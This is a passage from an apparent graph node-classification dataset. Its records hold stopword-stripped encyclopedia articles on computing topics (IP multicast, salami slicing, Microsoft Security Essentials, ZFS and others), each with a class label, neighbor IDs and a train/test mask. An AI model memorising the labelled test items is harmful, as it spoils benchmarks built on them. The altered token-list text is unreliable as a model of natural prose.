01:00:5e:00:00:00–01:00:5e:7f ff ff oui owned iana range 23 bits available address space first octet 01 includes broadcast/multicast bit lower 23 bits 28-bit multicast ip address mapped 23 bits available ethernet address space means ambiguity delivering packets two hosts subnet subscribe different multicast group whose address differs first 5 bits ethernet packets multicast groups delivered hosts requiring network software hosts discard unrequired packets ipv6 multicast addresses ethernet mac derived four low-order octets or'ed mac 33:33:00:00:00:00 example ipv6 address ff02 dead beef :1:3 would map ethernet mac address 33:33:00:01:00:03 switch understand multicast addresses flood traffic members lan case system network card operating system filter packets sent multicast groups subscribed switches listen igmp traffic maintain state table network systems subscribed given multicast group table used forward traffic destined given group limited set hosts ports process listening igmp traffic called igmp snooping additionally switches layer 3 capabilities act igmp querier networks router present act multicast router switch igmp snooping querier enabled used generate needed igmp messages get users subscribe multicast traffic like ethernet 802.11 uses range mac addresses map ip multicast addresses however 802.11 wireless network handle multicast traffic differently depending configuration delivery traffic indication message dtim beacon interval settings stations within basic service set power save mode multicast packets sent immediately arrive one stations power save mode access points deliver multicast traffic dtim interval transmit one supported rates basic rate set retail wireless access points/routers interval either 102.4 ms beacon interval 100ms dtim 1 204.8 ms beacon interval 100ms dtim 2 transmit rate either 1 mbit/s 6 mbit/s depending operating band protection mode result dtim beacon interval settings adjusted optimum performance implementing multicast wireless networks unlike ethernet traffic 802.11 sent reliably using acks nacks radio interference n't cause unbearably high packet loss however multicast packets sent acknowledged subject much higher loss rates various methods coping choosing unicast multicast data repeatedly client requesting acks client methods require modification access point supported enterprise-class devices improvements would require modifications clients therefore seen widespread adoption ip multicast internet communication method single data packet transmitted sender replicated set receivers replication techniques somewhat dependent upon media used transmit data transmission multicast inherent broadcast media ethernet satellite link automatically allows data packet received receivers directly attached media contrast transmission multicast media point-to-point point-to-multipoint requires packet replicated link replication process occur optimal manner distribution tree built within network packet replicated branches tree mitigates requirement sender replicate packet recipient use ipsec communication link requires point-to-point connection establishment usually security required sender receiver implies sender must replicate packet secure connections one receiver number receivers grows sender must scale replicating packet receivers processing load placed sender high limits scalability sender new method required securely transmit multicast referred secure multicast multicast security internet engineering task force ietf created new internet protocol ip securely transmit multicast traffic across packet network protocol definition developed multicast security workgroup led several request comments rfc used standards securing ip multicast traffic protocol allowed sender encrypt multicast packet forward packet network optimal distribution tree packet may replicated optimal locations network delivered receivers receivers capable decrypting packet forwarding packet secure network environment sender multicast packet know potential receivers therefore creation pair-wise encryption keys one receiver impossible sender must encrypt packets using shared key legitimate receivers use decrypt packets security system based ability control distribution keys legitimate receivers ietf created group domain interpretation gdoi protocol defined rfc-6407 protocol allows sender receiver join key server policies keys encrypted distributed members secure multicast group key server authenticate authorize senders receivers specific group shared key used encrypt decrypt traffic members group multicast nature connection-oriented mechanism protocols tcp allows retransmission missing packets appropriate applications streaming audio video occasional dropped packet problem distribution critical data mechanism required requesting retransmission one scheme proposed cisco pgm originally pretty good multicasting changed trademark reasons pragmatic general multicast documented rfc 3208 scheme multicast packets sequence numbers packet missed recipient request packet re-multicast members multicast group ignoring replacement data needed expanded version pgm-cc attempted make ip multicasting tcp friendly stepping entire group bandwidth available worst receiver two schemes documented internet engineering task force ietf standards-track protocol nack-oriented reliable multicast norm documented rfc 5740 rfc 5401 protocol file delivery unidirectional transport flute documented rfc 6726 open-source addition proprietary implementations exist protocols exist scalable reliable multicast defined variety sources protocols vary means error detection mechanisms used error recovery scalability recovery underlying ideas involved means reliable list reliable multicast protocols acm sigcomm multicast workshop august 27 1996 documents number approaches problem independent groups like internet protocol multicast standards initiative ipmsi claimed lack truly scalable secure reliable ip multicast protocol like proposed secure multicast advanced repeating television smart hampered adoption ip multicast inter-domain routing lack widely adopted system aes level security scalable reliability kept mass media transmissions sporting events like super bowl and/or breaking news events transmitted public internet reliable ip multicasting protocols pgm smart experimental standards-track protocol norm standards-track revision rfc 3941 specified rfc 5401 standards-track revision rfc 3940 specified rfc 5740 since multicast different transmission mode unicast protocols designed multicast sensibly used multicast existing application protocols use multicast run top user datagram protocol udp many applications real-time transport protocol rtp used framing multimedia content multicast resource reservation protocol rsvp may used bandwidth reservation network supporting multicast distribution multicast dns mdns used resolve domain host names without dedicated dns server using multicast ip multicast widely deployed enterprises commercial stock exchanges multimedia content delivery networks common enterprise use ip multicast iptv applications live television distribution televised company meetings hospitality industry ip multicast become common iptv distribution hotels retail sector ip multicast widely used tv distribution video advertising applications pay-tv operators educational institutions significant on-campus student housing deployed ip multicast deliver one-way streaming media high-speed video large groups receivers additionally uses audio video conferencing using multicast technologies far less prevalent often relegated research education institutions often greater degree network capacity handle demands technical conferences meetings transmitted using ip multicast recently many sessions ietf meetings delivered using multicast another use multicast within campus commercial networks file distribution particularly deliver operating system images updates remote hosts key advantage multicast boot images unicasting boot images significantly lower network bandwidth usage ip multicast also seen deployment within financial sector applications stock tickers hoot-n-holler systems ip multicast seen success areas multicast services generally available average end-user two major related factors lack widespread deployment first forwarding multicast traffic imposes great deal protocol complexity network service providers second core network infrastructure exposes far greater attack surface particular vulnerability denial-of-service attacks large state requirements routers make applications using large number trees unable work using ip multicast take presence information example person needs keep least one tree subscribers several mechanism yet demonstrated would allow ip multicast model scale millions senders millions multicast groups thus yet possible make fully general multicast applications practical reasons also reasons economics ip multicast general used commercial internet backbones rfc 3170 ip multicast applications challenges solutions provides overview deployment issues ip multicasting first developed steve deering stanford university received ieee internet award mbone long-running experimental approach enabling multicast sites use tunnels mbone longer operational renewed interest tunneling multicast traffic order make service available wide array end users castgate attempt etro-tele research group vrije universiteit brussel adopt ip multicast internet although multicast would allowed internet user receive rich media content without placing high burden net still unavailable internet users castgate project tried fix allowing end users connect automatically configured ip tunnel networks natively support ip multicast idea users multicast capability content providers would see benefit streaming content multicast hope enough content providers users used service internet service providers would enable ip multicast natively customers castgate supplied software client microsoft windows linux connect castgate tunnel network also supplied tools add tunnel servers tools receive session announcement protocol announcements multicast network video audio streams project maintained web site 2007 starting 2005 bbc began encouraging uk-based internet service providers adopt multicast-addressable services networks providing bbc radio higher quality available via unicast-addressed services also supported variety commercial radio networks including bbc gcap media emap virgin radio german public-service broadcasters ard zdf franco-german network arte offer tv program multicasted several networks austrian internet service provider telekom austria offers digital subscriber line dsl customers tv set-top box uses multicast addressing receiving tv radio broadcasts germany t-home brand deutsche telekom offers similar service",
    "neighbors": [
      9225,
      6797,
      5653,
      11413,
      3742,
      10270,
      10274,
      10402,
      9381,
      425,
      4396,
      1197,
      10924,
      8627,
      823,
      7865,
      10171,
      2509,
      8654,
      1616,
      6613,
      5469,
      5470,
      10461,
      5472,
      7908,
      367,
      7411,
      3444
    ],
    "mask": "Test"
  },
  {
    "node_id": 1412,
    "label": 6,
    "text": "File_copying:file copying digital file management file copying creation new file content existing file computer operating systems include file copying methods users operating systems graphical user interfaces guis often providing copy-and-paste drag-and-drop methods file copying operating systems may specialized file copying apis usually able tell server perform copying locally without sending file contents network thus greatly improving performance file copying creation new copy file content existing file several different technologies use term file shadowing intent file shadowing within technologies provide exact copy mirror set data file shadowing effective shadow needs exist separate physical location original data depending reasons behind shadow operation location may close second harddrive chassis far away side globe computer operating systems include file copying provisions user interface like command cp unix copy ms-dos operating systems graphical user interface gui usually provide copy-and-paste drag-and-drop methods file copying file manager applications provide easy way copying files internally however systems specialized application programming interfaces apis copying files like copyfile copyfileex windows api others like unix ms-dos fall back simply reading contents old file writing new file makes little difference local files computer hard drive provides interesting situation source target files located remote file server operating systems specialized file copying apis usually able tell server perform copying locally without sending file contents network thus greatly improving performance systems comparable apis however read file contents network send back network sometimes remote file copying performed specialized command like ncopy ms-dos clients novell netware even complicated situation arises one needs copy files two remote servers simple way read data one server write data second server",
    "neighbors": [
      2432,
      1990,
      3366,
      9166,
      7983,
      3056,
      5492,
      10101,
      2198,
      1750,
      8504,
      5754,
      8988
    ],
    "mask": "Test"
  },
  {
    "node_id": 1413,
    "label": 4,
    "text": "Salami_slicing:salami slicing salami slicing refers series many small actions often performed clandestine means accumulated whole produces much larger action result would difficult unlawful perform term typically used pejoratively although salami slicing often used carry illegal activities strategy gaining advantage time accumulating small increments used legal ways well example salami slicing also known penny shaving fraudulent practice stealing money repeatedly extremely small quantities usually taking advantage rounding nearest cent monetary unit financial transactions would done always rounding putting fractions cent another account idea make change small enough single transaction go undetected information security salami attack series minor attacks together results larger attack computers ideally suited automating type attack politics term salami tactics used since 1940s refer divide conquer process threats alliances used overcome opposition academia salami slicing refers practice creating several short publications material could perhaps validly published single article journal review see also least publishable unit january 1993 four executives rental-car franchise florida charged defrauding least 47,000 customers using salami technique los angeles october 1998 district attorneys charged four men fraud allegedly installing computer chips gasoline pumps cheated consumers overstating amounts pumped 2008 man arrested fraudulently creating 58,000 accounts used collect money verification deposits online brokerage firms cents time 6 september 2018 british mp tom tugendhat house commons speech accused russian government salami slicing tactics salami slicing played key role plots several films including superman iii office space latter title characters reference superman iii inspiration 1972 episode tv series m*a*s*h radar attempts ship entire jeep home korea one piece time hawkeye commented mailman would retroactive hernia found 1987 tv movie perry mason case murdered madam features murder trial involving transfer fractional cents bank employees johnny cash one piece time similar plot m*a*s*h episode cadillac parts model years 1949 1973",
    "neighbors": [
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 1414,
    "label": 6,
    "text": "ULLtraDIMM:ulltradimm ulltradimm solid state storage device sandisk connects flash storage directly onto ddr3 memory bus unlike traditional pcie flash storage devices ulltradimm plugged directly industry standard rdimm memory bus slot server design connection location provides deterministic consistent known latency enable applications streamlined improved performance ulltradimm compatible jedec mo-269 ddr3 rdimm specification ulltradimm supports support 1.35 v 1.5 v operation 800–1333 mhz 1.5 v 1600 mhz ddr3 transfer rates ddr3 ecc bits used verify integrity data sent across memory bus ulltradimm verify correct ecc received errors device driver re-run transfer cpu treats ecc ulltradimm manner ecc memory dimm single symbol errors corrected ddr3 ecc bits stored flash array separate ecc scheme used protecting data flash array memory interleaving standard ram affected presence ulltradimms uefi/bios updates required properly recognize ulltradimm system block device halt bootstrap sequence",
    "neighbors": [
      6033,
      1515,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 1415,
    "label": 4,
    "text": "Security_First_Corp:security first corp security first corp rancho santa margarita ca information assurance data security company company holds 250 patents software defined data security including secure parser extended spx technology encrypts randomly splits data multiple segments storing different locations technology also called bitsplitting security first corp founded 2002 mark o'hare 26-year navy veteran served program executive officer us navy aircraft carrier program 2008 information technology company unisys integrated security first secure parser technology stealth brand software windows servers desktops june 2009 company acquired silicon valley-based drc computer corporation drc developer acceleration coprocessors security first reportedly using drc products information security appliance planned operate drc wholly owned subsidiary august 2011 ibm announced integrating three security first cryptographic technologies next generation chips increase security december 2014 security first released spxsharc vmware vcenter server running vmware esxi hypervisor 2015 ibm announced using security first spxbitfiler-ips encryption technology allow ibm pureapplication system virtual pattern deployers encrypt on-disk data technology also licensed ibm cloud data encryption service icdes security first core product secure parser extended spx technology encrypts data scrambles randomly disperses different locations technology combines aes-256 certified encryption multi-factor secret sharing keyed information dispersal cryptographic random bit-splitting solution compliant common government industry data protection standards security requirements company offers spx sharc security suite designed multi-site data protection spx gateway data protection solution designed protect data stored across multiple cloud computing service providers process company calls cloud spanning parsedcloud file transfer application encrypts splits transfers data multiple sites available free fee-based versions december 2014 former apple ceo john sculley interviewed fox news called security first bitsplitting technology gamechanger december 2014 sec filing company announced raised 29 million sales debt equity undisclosed investors april 2016 sec filing company announced raised additional 36 million sales debt equity also undisclosed investors company operates drc computer corporation wholly owned subsidiary",
    "neighbors": [
      4194,
      3686,
      6153,
      7979,
      11244,
      6415,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 1416,
    "label": 2,
    "text": "K12LTSP:k12ltsp k12ltsp modification centos operating system linux terminal server project ltsp packages integrated designed easy install configure k12ltsp offshoot linux school project k12linux k-12 often used united states refer grade school kindergarten high school 12th grade",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      4887,
      10394,
      543,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957,
      1406
    ],
    "mask": "Train"
  },
  {
    "node_id": 1417,
    "label": 4,
    "text": "Microsoft_Security_Essentials:microsoft security essentials microsoft security essentials mse antivirus software av provides protection different types malicious software computer viruses spyware rootkits trojan horses prior version 4.5 mse ran windows vista windows 7 windows 8 later built-in av components known windows defender mse 4.5 later versions run windows xp license agreement allows home users small businesses install use product free-of-charge replaces windows live onecare discontinued commercial subscription-based av service free windows defender protected users spyware windows8 built upon scanning engine virus definitions microsoft antivirus products provides real-time protection constantly monitoring activities computer scanning new files created downloaded disabling detected threats lacks onecare personal firewall forefront endpoint protection centralized management features microsoft announcement av software november 18 2008 met mixed reactions av industry symantec mcafee kaspersky lab—three competing independent software vendors—dismissed unworthy competitor avg technologies avast software appreciated potential expand consumers choice av software avg mcafee sophos trend micro claimed integration product microsoft windows would violation competition law product received generally positive reviews praising user interface low resource usage freeware license secured av-test certification october 2009 demonstrated ability eliminate widely encountered malware lost certification october 2012 june 2013 mse achieved lowest possible protection score zero however microsoft significantly improved product couple years preceding february 2018 mse achieved av-test top product award detecting 100 samples used test according march 2012 report anti-malware specialist opswat mse popular av product north america second popular world resulted appearance several rogue antivirus programs try impersonate microsoft security essentials automatically checks downloads latest virus definitions microsoft update updated three times day users may alternatively download updates manually microsoft security portal website september 30 2011 faulty definition update caused product incorrectly tag google chrome malware issue resolved within three hours mse originally ran windows xp windows vista windows 7 although versions 4.5 later run windows xp microsoft stopped producing automatic definition updates windows xp july 14 2015 however manual definition updates still available windows xp users run older versions mse mse built upon foundation microsoft security products use anti-malware engine known microsoft malware protection engine msmpeng virus definitions personal firewall component onecare centralized management features forefront endpoint protection mse provides real-time protection constantly monitoring activities computer scanning new files created downloaded internet quarantines detected threats prompts user input deal response received within ten minutes suspected threats handled according default actions defined application settings depending settings may also create system restore checkpoints removing detected malware part real-time protection mse reports suspicious behaviors monitored programs microsoft active protection service maps formerly microsoft spynet default report matches newly discovered malware threat unreleased virus definition new definition downloaded remove threat hardware requirements product depend operating system computer running windows vista windows 7 requires 1ghz processor 1gb ram computer monitor display resolution least 800 × 600 pixels 200mb free hard disk space stable internet connection november 18 2008 microsoft announced plans free consumer security product codenamed morro development marked change microsoft consumer av marketing strategy instead offering subscription-based security product host tools backup personal firewall morro would offer free av protection smaller impact system resources amy barzdukas senior director product management online services windows division microsoft announced morro would directly compete commercial av software rather focused 50 60 percent pc users would pay av protection 17 june 2009 official name morro revealed microsoft security essentials june 23 2009 microsoft released public beta 75,000 users united states israel china brazil anticipated available 20 markets 10 languages product scheduled release end 2009 final build released 29 september 2009 almost year initial release microsoft quietly released second version entered technical preview stage july 19 2010 final build released december 16 2010 includes network inspection system nis network intrusion detection system works windows vista windows 7 well new anti-malware engine employs heuristics malware detection version 2.0 integrates internet explorer protect users web-based threats nis requires separate set definition updates sixteen months release version 2.0 microsoft skipped version 3.0 released microsoft security essentials 4.0 public beta program started november 18 2011 microsoft sent invitations potential participants without announcing version number first beta version released november 29 2011 final build 24 april 2012 microsoft subsequently initiated pre-release program provides volunteers latest beta version accepts feedback february 21 2014 version 4.5 entered beta stage day microsoft announced starting version windows xp would supported older versions would continue receive automatic virus definition updates july 14 2015 afterwards users older versions may continue manually update definitions using microsoft site latest version 4.10 released november 29 2016 version 4.10.209.0 windows vista windows 7 update fixes bug introduced earlier version 4.10.205.0 removed “ scan microsoft security essentials entry right-click context menu files folders support mse officially ended windows vista windows xp older versions still function systems definition updates remain available still supported windows 7 january 14 2020 microsoft security essentials run windows 8 later security subsystem windows defender september 13 2011 build conference anaheim california microsoft unveiled developer preview windows 8 security component capable preventing infected usb flash memory compromising system boot process september 15 windows 8 developer blog confirmed windows defender windows 8 would take role virus protection included video jason garms microsoft showed windows defender registered action center av spyware protection tool blocks drive-by malware march 3 2012 softpedia reviewed consumer preview windows 8 noted similarity appearance windows defender microsoft security essentials 4.0 beta according softpedia windows 8 setup requires microsoft security essentials uninstalled upgrading windows 7 product license agreement allows home users download install use unlimited number computers households free charge long computer legitimately licensed copy microsoft windows since october 2010 small businesses also allowed install product 10 devices use academic institutions governmental locations forbidden reverse-engineering decompiling disassembling product working around designed limitations mse requires registration personal information submitted installation however validity operating system license verified installation using windows genuine advantage system said license found invalid software notify user cease operate period time announcement debut microsoft security essentials met mixed responses av industry symantec mcafee kaspersky lab three competing vendors claimed inferior software jens meggers symantec vice president engineering norton products dismissed average – nothing outstanding tom powledge symantec urged customers mindful protection chose bearing mind onecare offered substandard protection inferior user experience joris evers director worldwide public relations mcafee stated onecare market share less 2 understand microsoft decision shift attention core business justin priestley kaspersky stated microsoft continued hold low market share consumer market n't expect exit onecare change playing field drastically avast software said ambivalent view towards product vincent steckler avast software ceo said mse silver bullet also bad sequel one care claim representative avg technologies stated view positive step av landscape avg believed right free antivirus software past eight years however avg raised issue distributing software product said microsoft simply make product available adding integration microsoft security essentials microsoft windows would violation competition law mcafee sophos later trend micro affirmed antitrust lawsuit would surely followed microsoft bundled product windows announcement microsoft security essentials affected stocks av vendors november 19 2008 microsoft announced codename morro symantec mcafee shares fell 9.44 6.62 percent respectively 10 june 2009 announcing upcoming beta version microsoft shares rose 2.1 percent symantec mcafee shares however fell 0.5 1.3 percent respectively daniel ives analyst fbr capital markets said microsoft security essentials would long-term competitive threat although near-term impact would negligible public beta version received several reviews citing low resource usage straightforward user interface price point brian krebs washington post reported quick scan windows 7 computer took 10 minutes full scan 45 minutes ars technica reviewed positively citing organized interface low resource usage status freeware nick mediati pcworld noted mse clear-cut cleanly designed tabbed user interface however find settings cryptic confusing defaulting recommended action explanation action found help file also initially confused user interface failed mention microsoft security essentials automatically updates rather manually updated via update tab explanation feature included final release neil rubenking pc magazine successfully installed beta version 12 malware-infected systems commented small installation package 7 mb depending operating system speedy installation initial virus definition update took 5 15 minutes full installation occupied 110 mb disk space rubenking noted beta version sets windows update fully automatic mode although turned windows control panel full scans took hour infected systems scan clean system took 35 minutes on-demand scan test rubenking conducted june 2009 beta version found 89 percent malware samples 30 percent commercial keyloggers 67 percent rootkits half scareware samples product real-time protection found 83 percent malware blocked majority 40 percent commercial keyloggers 78 percent rootkits found 7 january 2010 microsoft security essentials best free software award pc advisor december year secured bronze award av-comparatives proactive detection 55 percent new unknown malware silver award low false-positives six occurrences bronze award overall performance october 2009 av-test conducted series trials final build product detected caught 98.44 percent 545,034 computer viruses computer worms software trojan horses well 90.95 percent 14,222 spyware adware samples also detected eliminated 25 tested rootkits generating false-positives june 2010 january 2013 av-test tested microsoft security essentials 14 times 11 14 cases mse secured av-test certification outperforming av industry average ratings microsoft security essentials 2.0 tested certified march 2011 product achieved protection score 2.5 6 repair score 3.5 6 usability score 5.5 6 report details show although version 2.0 able find malware samples wildlist widespread malware able stop internet-based attacks lacks personal firewall anti-spam capabilities april 2012 test version 2.1 achieved scores 3.0 5.5 5.0 protection repair usability version 4.0 windows 7 sp1 x64 tested june 2012 achieved scores 2.5 5.5 5.5 protection repair usability october 2012 product lost av-test certification microsoft security essentials 4.1 achieved scores 1.5 3.5 5.5 protection repair usability av-test 2011 annual review microsoft security essentials came last protection seventh repair fifth usability 2012 review came last protection best usability however lost certificate qualified usability award june 2013 mse achieved lowest possible protection score zero microsoft drastically improved mse detection time latest tests done av-test february 2018 mse achieved 100 detection malware samples protection 0-day malware attacks inclusive web e-mail threats real-world testing detection widespread prevalent malware discovered last 4 weeks av-test reference set categories earning av-tests top product award 29 september 2010 year initial release microsoft announced mse 30 million users security industry market share analysis report june 2011 published opswat describes one popular av products world 10.66 percent global market 15.68 percent north american market report shows microsoft number one av vendor north america 17.07 percent market share number four av vendor worldwide john dunn pcworld analyzed report noted tendency use free av software something new free antivirus suites around years tended seen poor relations paid software named microsoft security essentials influence pc users adopt free av software september 2011 opswat report found mse increased market share become second popular av product world remained popular north america opswat reported march 2012 product maintained position microsoft market share improved 2 percent worldwide 3 percent north america seth rosenblatt cnet news commented product share rose 7.27 2010 10.08 2012 stating use lightweight security suite exploded last year popularity microsoft security essentials led appearance malware abusing name february 2010 rogue security package calling security essentials 2010 appeared internet designated trojandownloader win32/fakeinit microsoft bears visual resemblance microsoft product reappeared november 2010 time calling security essentials 2011 dangerous rogue appeared august 2010 designated rogue win32/fakepav unknown win32/trojan closely resembles microsoft security essentials uses sophisticated social engineering deceive users infect systems guise five different fictional anti-malware products also terminates prevents launch 156 different programs including registry editor windows command prompt internet explorer mozilla firefox opera safari google chrome notes citations",
    "neighbors": [
      2049,
      10756,
      537,
      1052,
      550,
      2601,
      5673,
      6699,
      8753,
      5173,
      7739,
      9791,
      10308,
      4165,
      9287,
      10828,
      2654,
      4704,
      8805,
      10872,
      9341,
      1662,
      127,
      7809,
      131,
      6797,
      2196,
      10392,
      156,
      2721,
      2213,
      6823,
      5799,
      3243,
      6834,
      2749,
      704,
      7362,
      2244,
      202,
      1242,
      6382,
      3320,
      7426,
      5891,
      5380,
      2309,
      4374,
      6431,
      5924,
      1318,
      3366,
      297,
      2859,
      3885,
      8493,
      7983,
      7473,
      4403,
      9523,
      1337,
      9537,
      4421,
      1355,
      10574,
      8024,
      2907,
      7515,
      3935,
      9055,
      9569,
      3941,
      11622,
      877,
      4464,
      3955,
      4994,
      8584,
      2443,
      3981,
      10637,
      3482,
      9121,
      5540,
      8614,
      8615,
      6059,
      430,
      10166,
      7103,
      5057,
      7106,
      5069,
      10708,
      2005,
      11225,
      5082,
      8668,
      9695,
      11248,
      9713,
      6643,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 1418,
    "label": 2,
    "text": "Windows_Deployment_Services:windows deployment services windows deployment services server technology microsoft network-based installation windows operating systems successor remote installation services wds intended used remotely deploying windows vista windows 7 windows 8 windows 10 windows server 2008 windows server 2012 windows server 2016 also supports operating systems unlike predecessor ris method automating installation process wds uses disk imaging particular windows imaging format wim wds included server role 32-bit 64-bit versions windows server 2008 included optionally installable component windows server 2003 service pack 2 wds functions conjunction preboot execution environment pxe load miniature edition windows known windows pe installation maintenance tasks wds functions storage repository pxe network boot images well repository actual operating system images installed target computer multiple boot images available pxe booting via wds present end-user boot menu select image load simplify tasks capturing applying images two special scripted windows pe boot images created automate tasks scripted windows pe boot images created using windows automated installation kit combination windows 7 installation media containing source wim images added wds server boot image repository windows pe boot images may either 32- 64-bit 32-bit tends universally compatible across potential hardware types difficulty windows pe booting needs include network drivers disk controller drivers intended work target hardware imaged process adding drivers windows pe boot image automated using wds server console process repeated later time new system type needs captured current windows pe capture boot image include network drivers boot image updated additional drivers using wds interface automatically re-added wds boot image collection replace original specialty one-off systems wim driver update process necessary hard drive target system captured removed source system sysprepping either installed computer supported network drivers attached supported system using external usb hard drive adapter applying captured image involves running second windows pe apply boot image target system receive image boot image also needs appropriate network disk controller drivers windows pe capture boot image wds image creator may optionally select separate waik sysprep installation script applied image first boot alternate script selected within wds viewing properties uploaded system image technically possible create scripts manually perform imaging capture apply processes using command line tools provided microsoft however methods complex difficult general tools involved using imagex manually create wim require source operating system sysprepped source partition contain windows operating system type windows-accessible file system imaged including msdos source system either needs able run windows pe source system hard drive moved newer system supports windows pe microsoft generally requires windows 2000 xp vista windows 7 sysprepped imaging due certain security-related disk data microsoft requires unique across duplicated system images sysprep randomizes data image applied new system imagex disk formatting partitioning capabilities separate windows command line tools diskpart needed define partitions target system imagex use",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      9910,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      5003,
      5004,
      8080,
      4505,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      4074,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 1419,
    "label": 4,
    "text": "MailScanner:mailscanner mailscanner open source email security system use unix email gateways first released 2001 protects viruses spam malware phishing distributed gnu general public license original author julian field 2004 open source award ukuug product worldwide software estimated process eighty billion emails per month millions downloads isps mobile telephone networks included list users recently anti-phishing measures introduced software spots attempts obfuscating urls example lure user thinking signing bank reality using impostor web site modifies email suitable warning january 2014 project sponsored lead developer jerry benton founder mailborder systems january 2018 primary developer shawn iverson efa project project major contributor mark sapiro gnu mailman project mailscanner implemented around 50,000 lines perl links software packages order fulfill duties complex software platform performance results vary wildly depending wide variety factors 2009 evidence suggested quad xeon pc 2 gb ram 15 krpm scsi disks process something area 2.2 million messages per day number would dwarfed modern hardware",
    "neighbors": [
      4294,
      8582,
      5612,
      7983,
      10450,
      5492,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 1420,
    "label": 6,
    "text": "BetterZip:betterzip betterzip trialware file archiver developed robert rezabek first released may 2006 developed solely os x platform unlike built-in archive utility apple includes ability extract compress many archive formats well ability view archive selectively extract files without automatically extracting entire contents betterzip supports extraction following file types following file types supported archive creation betterzip include rar compression without separately downloading command line rar utility rarlab betterzip integrate rar compression gui like formats",
    "neighbors": [
      6022,
      10121,
      1940,
      3222,
      9880,
      3114,
      10027,
      7983,
      950,
      6713,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1421,
    "label": 7,
    "text": "Cloudian:cloudian cloudian inc. us enterprise data storage company headquartered san mateo california offices europe asia produces amazon s3-compatible object storage software scale-out file services software pre-configured hardware appliances cloudian launched 2011 ceo michael tso president hiroshi ohta 2012 cloudian signed deal japanese telecommunications company nippon telegraph telephone ntt power biz hosting cloud object storage service since cloudian customers include motorola wgbh t-mobile element fleet pirelli nifty casale tyco nextel 2014 cloudian raised 24 million investors including incj fidelity growth partners japan intel capital goldman sachs cloudian raised additional 41 million october 2016 existing investors four new investors lenovo city national bank epsilon venture partners dvp investment cloudian raised 25 million february 2018 gained commitment 100 million consumption model financing new investor digital alpha advisors cloudian announced partnership lenovo june 2016 sell appliance lenovo storselect line dx8200c powered cloudian august 2016 cloudian hyperstore software made available via amazon web services marketplace cloudian hyperstore operating environment software provides enterprise object storage software native amazon s3 support data tiered amazon s3 amazon glacier s3 endpoints tape libraries hyperstore supports logical storage policies configured replication erasure coding features include multi-tenancy quality service options set control permissions usage rate limits using hadoop analytics april 2016 cloudian released hyperstore 6.0 added built-in storage analytics object gps proactive repair hyperstore software available hybrid cloud storage service via aws marketplace usage details billing coming directly aws hyperstore 4000 appliance two compute nodes 4u enclosure appliance 256gb memory 128gb per node hold disk drives 12tb maximum raw capacity 840tb hyperstore 1500 1u storage appliance hold twelve 3.5 hard drives four hot swappable 2.5 ssds 1500 store 48tb 144tb data hyperfile 2u storage appliance provides file services employing cloudian hyperstore storage environment hyperfile supports smb cifs nfs ftp protocols supported lenovo dx8200c powered cloudian consists cloudian hyperstore software lenovo hardware appliance size 2u starts three nodes node supporting 112 tb internal storage lenovo provide tier 1 tier 2 support product tier 3 support escalated cloudian 2016 modern infrastructure impact award 2016 storage awards cloud product year 2016 computer technology review mvp award 2016 dcs awards data centre cloud storage product year finalist 2016 computable awards software year finalist 2016 svc awards cloud project year software defined/object storage product year finalist 2015 tmc cloud computing product year 2015 computer technology review mvp award 2015 storage awards one watch runner-up 2015 computer weekly european user awards best storage product year finalist 2014 searchstorage product year finalist",
    "neighbors": [
      11201,
      4194,
      1801,
      7248,
      1049
    ],
    "mask": "None"
  },
  {
    "node_id": 1422,
    "label": 6,
    "text": "History_and_implementations_of_ZFS:history implementations zfs history implementations zfs covers development zfs file system zfs began part sun microsystems solaris operating system 2001 large parts solaris including zfs published open source license opensolaris around 5 years 2005 placed closed source license oracle corporation acquired sun 2009/2010 2005 2010 open source version zfs ported linux mac os x continued maczfs freebsd 2010 illumos project forked recent version opensolaris continue development open source project including zfs 2013 co-ordination open source zfs moved umbrella organization openzfs allowed person organization wished use open source version zfs collaborate developing maintaining single common version zfs illumos remains closely involved openzfs 2018 two main implementations zfs quite similar oracle implementation closed source part solaris openzfs widely used provide zfs many unix-like operating systems 1987 corporation sun announced collaborating project merge popular unix variants market time berkeley software distribution unix system v xenix became unix system v release 4 svr4 project released name solaris became successor sunos 4 although sunos 4.1 x micro releases retroactively named solaris 1 zfs designed implemented team sun led jeff bonwick bill moore matthew ahrens announced september 14 2004 development started 2001 source code zfs integrated main trunk solaris development october 31 2005 released developers part build 27 opensolaris november 16 2005 june 2006 sun announced zfs included mainstream 6/06 update solaris 10 historically solaris developed proprietary software sun microsystems strong proponent open source software june 2005 sun released codebase cddl license founded opensolaris open-source project sun early 